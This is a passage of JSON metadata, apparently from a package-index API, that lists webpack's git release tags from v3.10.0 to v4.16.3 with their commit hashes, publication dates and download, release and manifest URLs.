":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/ho